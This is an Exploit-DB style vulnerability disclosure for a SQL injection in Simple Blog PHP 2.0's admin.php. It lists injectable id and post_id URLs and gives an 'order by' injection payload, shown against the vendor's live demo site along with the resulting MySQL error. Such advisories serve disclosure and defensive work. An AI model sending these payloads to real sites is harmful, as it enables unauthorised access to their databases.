Simple Blog PHP 2.0 - SQL Injection

EDB-ID:

40519

CVE:

N/A




Platform:

PHP

Date:

2016-10-13


=====================================================
# Simple Blog PHP 2.0 - SQL Injection
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# SQL Injection
This vulnerability is in admin.php file when we want to edit a post or
edit a categorie and..., with id parameter can show sql injection.

#PoC:
Vulnerable Url:
http://localhost/blog/admin.php?act=editPost&id=[payload]
http://localhost/blog/admin.php?act=editCat&id=[payload]
http://localhost/blog/admin.php?act=editComment&id=[payload]
http://localhost/blog/admin.php?act=comments&post_id=[payload]
Vulnerable parameter : id
Mehod : GET

A simple inject :
Payload : '+order+by+999--+
http://simpleblogphp.com/blog/admin.php?act=editPost&id=1'+order+by+999--+

In response can see result :
Could not execute MySQL query: SELECT * FROM blog_posts WHERE id=''
order by 999-- ' . Error: Unknown column '999' in 'order clause'

Result of payload: Error: Unknown column '999' in 'order clause'
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================